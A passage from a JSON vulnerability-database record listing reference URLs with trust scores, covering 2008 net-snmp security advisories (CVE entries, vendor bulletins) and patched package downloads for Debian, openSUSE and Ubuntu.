            "url": "http://www.frsirt.com/english/advisories/2008/2971"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2008/2361"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2008/1981/references"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2008/1836/references"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2008/1801/references"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2008/1800/references"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2008/1797/references"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2008/1788/references"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2008/1787/references"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-2292"
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/en/us/products/products_applied_mitigation_bulletin09186a00809adfc8.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.net-snmp.org/"
          },
          {
            "trust": 0.3,
            "url": "http://www.ingate.com/relnote.php?ver=471"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/493218"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/493238"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/493304"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/495389"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2008-252.htm"
          },
          {
            "trust": 0.3,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026id=766427"
          },
          {
            "trust": 0.3,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026documentoid=905600\u0026poid="
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0529.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-238865-1"
          },
          {
            "trust": 0.3,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0960"
          },
          {
            "trust": 0.2,
            "url": "http://www.vmware.com/security"
          },
          {
            "trust": 0.2,
            "url": "http://kb.vmware.com/kb/1055"
          },
          {
            "trust": 0.2,
            "url": "http://www.vmware.com/support/policies/security_response.html"
          },
          {
            "trust": 0.2,
            "url": "http://www.vmware.com/support/policies/eos.html"
          },
          {
            "trust": 0.2,
            "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
          },
          {
            "trust": 0.2,
            "url": "http://www.vmware.com/support/policies/eos_vi.html"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-4309"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-2292"
          },
          {
            "trust": 0.1,
            "url": "http://sourceforge.net/tracker/index.php?func=detail\u0026amp;aid=1989089\u0026amp;group_id=12694\u0026amp;atid=456380"
          },
          {
            "trust": 0.1,
            "url": "http://marc.info/?l=bugtraq\u0026amp;m=127730470825399\u0026amp;w=2"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx303-200810503-sg.zip"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-3281"
          },
          {
            "trust": 0.1,
            "url": "http://vmware.com/support/esx25/doc/esx-255-200810-patch.html"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/esx/esx-2.5.4-119703-upgrade.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1006968"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1006971"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx-1006968.tgz"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-2327"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-2327"
          },
          {
            "trust": 0.1,
            "url": "http://vmware.com/support/esx25/doc/esx-254-200810-patch.html"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3281"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/esx/esx-2.5.5-119702-upgrade.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://ecos.sourceware.org"
          },
          {
            "trust": 0.1,
            "url": "http://www.ece.ucdavis.edu/ucd-snmp"
          },
          {
            "trust": 0.1,
            "url": "http://www.net-snmp.org"
          },
          {
            "trust": 0.1,
            "url": "http://www.ocert.org"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://www.debian.org/security/faq"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3-7etch4.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3-7etch4.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-base_5.2.3-7etch4_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://packages.debian.org/\u003cpkg\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://www.debian.org/security/"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/tkmib_5.2.3-7etch4_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/perl-snmp-5.4.1-19.2.i586.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://download.opensuse.org/pub/opensuse/update/11.0/rpm/src/net-snmp-5.4.1-77.2.src.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/libsnmp15-5.4.1-19.2.i586.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/"
          },
          {
            "trust": 0.1,
            "url": "http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/net-snmp-devel-5.4.1-19.2.i586.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/libsnmp15-5.4.1-77.2.i586.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://download.opensuse.org/pub/opensuse/update/11.0/rpm/x86_64/net-snmp-32bit-5.4.1-77.2.x86_64.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/perl-snmp-5.4.1-77.2.i586.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://download.opensuse.org/pub/opensuse/update/10.3/rpm/src/net-snmp-5.4.1-19.2.src.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
          },
          {
            "trust": 0.1,
            "url": "http://download.novell.com/index.jsp?search=search\u0026keywords=71093bdfd49361f6dbe32a8fde43b848"
          },
          {
            "trust": 0.1,
            "url": "http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/net-snmp-5.4.1-77.2.i586.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://download.opensuse.org/pub/opensuse/update/10.3/rpm/x86_64/net-snmp-32bit-5.4.1-19.2.x86_64.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/snmp-mibs-5.4.1-77.2.i586.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/snmp-mibs-5.4.1-19.2.i586.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/net-snmp-5.4.1-19.2.i586.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/net-snmp-devel-5.4.1-77.2.i586.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.4.1~dfsg-7.1ubuntu6.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-4ubuntu4.2.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.3.1-6ubuntu2.2.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.3.1-6ubuntu2.2_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.3.1.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.2.1.2.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.2.1.2-4ubuntu2.3_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.4.1~dfsg-7.1ubuntu6.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-7.1ubuntu6.1.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.3.1-6ubuntu2.2_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.4.1~dfsg-4ubuntu4.2_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_i386.deb"
          },
          {
            "trust": 0.1,
